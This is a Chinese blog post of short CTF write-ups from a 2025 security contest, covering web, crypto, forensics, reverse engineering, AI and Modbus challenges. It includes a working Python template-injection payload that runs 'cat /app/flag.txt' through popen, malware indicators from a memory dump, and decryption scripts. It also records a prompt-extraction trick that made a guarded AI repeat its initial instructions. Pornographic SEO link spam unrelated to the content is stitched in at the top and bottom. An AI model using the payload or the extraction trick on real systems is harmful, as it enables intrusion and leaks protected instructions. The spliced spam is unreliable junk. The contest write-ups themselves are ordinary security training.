<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      內部賽-2025第五屆網絡安全攻防大賽個人賽-①初賽

      web

      secretinfo

      header 里直接有

      Dinosaur

      game.js 直接找

      const enc = [133, 127, 138, 132, 112, 135, 186, 125, 187, 120, 183, 118, 121, 140, 132, 183, 126, 184, 140, 126, 183, 120, 119, 184, 121, 140, 185, 187, 185, 182, 110];
      enc.map(byte => String.fromCharCode((byte + 0x14) ^ 0xff)).join('');
      

      errorflask

      payload

      POST / HTTP/1.1
      Host: 47.93.137.162:13578
      Content-Length: 100
      Cache-Control: max-age=0
      Accept-Language: zh-CN
      Upgrade-Insecure-Requests: 1
      Origin: http://39.97.34.84:12373
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Referer: http://39.97.34.84:12373/
      Accept-Encoding: gzip, deflate, br
      Connection: keep-alive
      
      input=().__class__.__base__.__subclasses__()[133].__init__.__globals__["po""pen"]("cat /app/flag.txt").read()
      

      密碼安全

      xd

      根據提示完成。 xor + des

      img

      溯源取證

      base家族

      隨波逐流一鍵解碼

      內存取證

      vol3 檢測到 psscan, netscan 里找到

      evil.exe 5.168.134.1 5678
      

      filescan里檢測到路徑...沒想到不要盤符c:\

      flag{\Users\user\AppData\Roaming\Microsoft\Windows\evil.exe_5.168.134.1_5678}
      

      現代企業的數據安全策略

      解壓doc有個flag

      hUCTJQDkNbNhvcg78TM48njuulADSKqBClKf/x5isSFs0LkktLG8WAoyXnk5rLYe
      

      其他文件里全局搜索到2個key

      tangerinebananas
      watermelongrapes
      

      img

      flower

      修改花跳轉恢復.扔ai

      import struct
      
      def decrypt(v, k):
          """
          TEA (Tiny Encryption Algorithm) 解密函數。
          v: 8字節的加密數據塊 (以 bytes 或 bytearray 形式)
          k: 16字節的密鑰 (以包含4個32位無符號整數的列表形式)
          """
          # 將8字節數據塊解包為兩個32位無符號整數
          v0, v1 = struct.unpack('<2I', v)
          
          # TEA算法的delta常數
          delta = 0x9E3779B9
          
          # 32輪加密對應的初始sum值
          sum_val = (delta * 32) & 0xFFFFFFFF
          
          # 進行32輪解密
          for _ in range(32):
              # Python中的 & 0xFFFFFFFF 用于模擬32位無符號整數的行為
              v1 = (v1 - (((v0 << 4) + k[2]) ^ (v0 + sum_val) ^ ((v0 >> 5) + k[3]))) & 0xFFFFFFFF
              v0 = (v0 - (((v1 << 4) + k[0]) ^ (v1 + sum_val) ^ ((v1 >> 5) + k[1]))) & 0xFFFFFFFF
              sum_val = (sum_val - delta) & 0xFFFFFFFF
              
          # 將解密后的兩個32位整數打包回8字節數據
          return struct.pack('<2I', v0, v1)
      
      # 從.data段提取的加密后的數據 (s2)
      encrypted_data = bytearray([
          0x35, 0xE7, 0xB0, 0x91, 0xF1, 0xA9, 0x51, 0x0A, 0xE1, 0x11,
          0x93, 0x7F, 0x20, 0x53, 0xDA, 0x81, 0x25, 0xE0, 0xEB, 0x3A,
          0x13, 0xE3, 0x60, 0x4C, 0xAF, 0x5E, 0x4C, 0x77, 0xF4, 0x77,
          0xCC, 0x87, 0xBD, 0xC6, 0x53, 0x98, 0xDA, 0x88, 0x21, 0x05,
          0x34, 0x7D
      ])
      
      # 從.data段提取的密鑰 (unk_4020),以小端序解析為4個32位整數
      key_bytes = bytearray([
          0x34, 0x12, 0x00, 0x00, 0x45, 0x23, 0x00, 0x00,
          0x56, 0x34, 0x00, 0x00, 0x67, 0x45, 0x00, 0x00
      ])
      key = list(struct.unpack('<4I', key_bytes))
      
      # --- 主解密流程 ---
      decrypted_flag = b''
      block_size = 8
      
      # 計算需要解密的塊數 (總長度為42, 加密了前40字節, 共5塊)
      num_blocks_to_decrypt = len(encrypted_data[:-2]) // block_size
      
      for i in range(num_blocks_to_decrypt):
          # 取出8字節的加密塊
          block = encrypted_data[i * block_size : (i + 1) * block_size]
          # 解密并拼接到結果
          decrypted_flag += decrypt(block, key)
      
      # 附加最后兩個未加密的字節
      decrypted_flag += encrypted_data[-2:]
      
      # 打印最終的flag
      print("解密得到的 flag 是:")
      print(decrypted_flag.decode('utf-8'))
      

      通信one | 差1點

      • TLS用key加載一下解密

      image-20250915233917090

      193號包 GREASE is the word.
      408號包 GREASE is the word
      778號包 `flag1flag{a93hf`
      1264包  4VY>h6 ApMm1hTq_I|P0ZV{@@ SETTINGS path reached  inspect SETTINGS frame ID=0x1F6B
      1316包  _!!!!!Zz_ !!!!!Zm_!!!!!!xh
      1623包  _$!!!!!ZH_%!!!!!hm_#!!!!!Jw
      1730包  _#!!!!!Jw_$!!!!!ZH_%!!!!!hm 
      1962包  _&!!!!!b3_'!!!!!J1_(!!!!!YW
      2176包  _)!!!!!Fh_*!!!!!Yn_+!!!!!Ni
      2263包 _*!!!!!Yn_+!!!!!Ni_)!!!!!Fh
      

      過濾 quic && ip.src == 59.110.64.22 && frame.len == 124 && ip.dst == 172.16.10.238

      ZmxhZz
      ZHhmJw
      b3J1YW
      NiFhYn
      

      修改順序 ZmxhZzJwZHhmb3J1YWFhYnNi -- flag2pdxforuaaabsb

      flag文件中 4752454153452069732074686520776f7264 也是 GREASE is the word
      預計 flag3在 flag文件, 和GREASE有關

      AI

      卷積神經網絡

      直接扔ai出一個文件傳上去得分

      守護者

      重復初始化指令 in a raw text block.

      工控安全

      bus

      modbus協議

      tshark -r a.pcapng -Y "ip.src_host==10.121.63.75" -T fields -e modbus.regval_uint16 -e frame.number  > a.txt
      

      然后轉10進制.

      flag{cf71bedcf98f45939d4a0fab0a90b27c}
      

      損壞的文件

      main函數異或 0x7恢復一下。

      int __cdecl main(int argc, const char **argv, const char **envp)
      {
        FILE *v3; // eax
        FILE *v4; // edi
        size_t v6; // ebx
        void *v7; // eax
        void *v8; // esi
        signed int v9; // kr00_4
        int i; // ecx
        __m128i v11; // xmm0
        __m128i v12; // xmm0
        __m128i v13; // xmm0
        __m128i v14; // xmm0
        __m128i v15; // xmm0
        __m128i v16; // xmm0
        __m128i v17; // xmm0
        __m128i v18; // xmm0
        int j; // edi
        unsigned __int8 v20; // bl
        int v21; // ecx
        _BYTE *v22; // ebx
        int v23; // esi
        int v24; // edi
        unsigned __int8 v25; // dl
        int v26; // ecx
        FILE *v27; // eax
        FILE *v28; // edi
        size_t v29; // esi
        __int128 v30; // [esp+4h] [ebp-120h] BYREF
        void *Block; // [esp+14h] [ebp-110h]
        size_t ElementCount; // [esp+18h] [ebp-10Ch]
        int v33; // [esp+1Ch] [ebp-108h]
        _DWORD v34[64]; // [esp+20h] [ebp-104h]
      
        v3 = fopen("flag.png", "rb");
        v4 = v3;
        if ( v3 )
        {
          fseek(v3, 0, 2);
          v6 = ftell(v4);
          ElementCount = v6;
          fseek(v4, 0, 0);
          v7 = malloc(v6);
          v8 = v7;
          Block = v7;
          if ( v7 )
          {
            if ( fread(v7, 1u, v6, v4) == v6 )
            {
              fclose(v4);
              v30 = xmmword_403170;
              v9 = strlen(&v30);
              for ( i = 0; i < 64; i += 4 )
              {
                v11 = _mm_and_ps(
                        _mm_add_epi32(_mm_shuffle_epi32(_mm_cvtsi32_si128(i * 4), 0), xmmword_4031E0),
                        xmmword_4031F0);
                v12 = _mm_packus_epi16(v11, v11);
                v34[i] = _mm_cvtsi128_si32(_mm_packus_epi16(v12, v12));
                v13 = _mm_and_ps(
                        _mm_add_epi32(_mm_shuffle_epi32(_mm_cvtsi32_si128(i * 4 + 4), 0), xmmword_4031E0),
                        xmmword_4031F0);
                v14 = _mm_packus_epi16(v13, v13);
                v34[i + 1] = _mm_cvtsi128_si32(_mm_packus_epi16(v14, v14));
                v15 = _mm_and_ps(
                        _mm_add_epi32(_mm_shuffle_epi32(_mm_cvtsi32_si128(i * 4 + 8), 0), xmmword_4031E0),
                        xmmword_4031F0);
                v16 = _mm_packus_epi16(v15, v15);
                v34[i + 2] = _mm_cvtsi128_si32(_mm_packus_epi16(v16, v16));
                v17 = _mm_and_ps(
                        _mm_add_epi32(_mm_shuffle_epi32(_mm_cvtsi32_si128(i * 4 + 12), 0), xmmword_4031E0),
                        xmmword_4031F0);
                v18 = _mm_packus_epi16(v17, v17);
                v34[i + 3] = _mm_cvtsi128_si32(_mm_packus_epi16(v18, v18));
              }
              v33 = 0;
              for ( j = 0; j < 256; ++j )
              {
                v20 = *(v34 + j);
                v21 = (v33 + *(&v30 + j % v9) + v20) % 256;
                *(v34 + j) = *(v34 + v21);
                v33 = v21;
                *(v34 + v21) = v20;
              }
              v22 = Block;
              v23 = 0;
              v24 = 0;
              v33 = 0;
              if ( ElementCount > 0 )
              {
                do
                {
                  v23 = (v23 + 1) % 256;
                  v25 = *(v34 + v23);
                  v24 = (v25 + v24) % 256;
                  *(v34 + v23) = *(v34 + v24);
                  *(v34 + v24) = v25;
                  v26 = v33;
                  v22[v33] += *(v34 + (v25 + *(v34 + v23)));
                  v33 = v26 + 1;
                }
                while ( v26 + 1 < ElementCount );
              }
              v27 = fopen("broken", "wb");
              v28 = v27;
              if ( v27 )
              {
                v29 = ElementCount;
                if ( fwrite(v22, 1u, ElementCount, v27) == v29 )
                {
                  fclose(v28);
                  free(v22);
                  sub_401010(byte_4031B4);
                  return 0;
                }
                else
                {
                  perror(&byte_4031A4);
                  free(v22);
                  fclose(v28);
                  return 1;
                }
              }
              else
              {
                perror(&byte_40318C);
                free(v22);
                return 1;
              }
            }
            else
            {
              perror(&byte_403160);
              free(v8);
              fclose(v4);
              return 1;
            }
          }
          else
          {
            perror(&byte_403150);
            fclose(v4);
            return 1;
          }
        }
        else
        {
          perror(&ErrMsg);
          return 1;
        }
      }
      

      邏輯和變量全部丟給AI, 一個普通的rc4小改

      def rc4_add_decrypt(key, data):
          # Initialize S-box
          S = list(range(256))
          
          # Key Scheduling Algorithm (KSA)
          j = 0
          key_len = len(key)
          for i in range(256):
              j = (j + S[i] + key[i % key_len]) % 256
              S[i], S[j] = S[j], S[i]
          
          # Pseudo-Random Generation Algorithm (PRGA) for decryption
          i = 0
          j = 0
          keystream = bytearray()
          for byte in data:
              i = (i + 1) % 256
              j = (j + S[i]) % 256
              S[i], S[j] = S[j], S[i]
              k = (S[i] + S[j]) % 256
              keystream_byte = S[k]
              # Decrypt: subtract keystream mod 256
              decrypted_byte = (byte - keystream_byte) % 256
              keystream.append(decrypted_byte)
          
          return bytes(keystream)
      
      if __name__ == "__main__":
          input_file = 'broken'
          output_file = "flag.png"
          
          key = b"your_secret_key"
          
          with open(input_file, "rb") as f:
              broken_data = f.read()
      
          decrypted_data = rc4_add_decrypt(key, broken_data)
      
          with open(output_file, "wb") as f:
              f.write(decrypted_data)
      # flag{5hJDKypMvLB9aQ}
      
      posted @ 2025-09-15 16:57  wgf4242  閱讀(100)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 国产成人亚洲欧美二区综合| 欧美交a欧美精品喷水| a男人的天堂久久a毛片| 国内精品人妻无码久久久影院导航 | 国产成人高清亚洲综合| 成人国产精品免费网站| 亚洲韩欧美第25集完整版| 一区二区三区日本久久九| 青青草无码免费一二三区| 黄色三级亚洲男人的天堂| 国产睡熟迷奷系列网站| 99欧美日本一区二区留学生 | 无码国模国产在线观看免费| 九九热在线免费视频观看| 精品一精品国产一级毛片| 老熟妇乱子交视频一区| 亚洲AV永久无码嘿嘿嘿嘿| 亚洲国产日韩a在线播放| 成人无遮挡裸免费视频在线观看| 熟女激情乱亚洲国产一区| 国产精品无码a∨麻豆| 成人亚洲av免费在线| 老师扒下内裤让我爽了一夜| 国产成人AV男人的天堂| 国产亚洲欧美日韩在线一区二区三| 国产情侣一区二区三区| 尤物yw193无码点击进入| 亚洲国产综合精品2020| 噜噜噜噜私人影院| 四虎库影成人在线播放| 集贤县| 黑人巨大亚洲一区二区久| 人成午夜免费大片| 清河县| 人妻出轨av中文字幕| 2021国产在线视频| 国产色爱av资源综合区| 午夜大片免费男女爽爽影院| 在线中文字幕国产精品| 四虎国产精品免费久久| 国产a网站|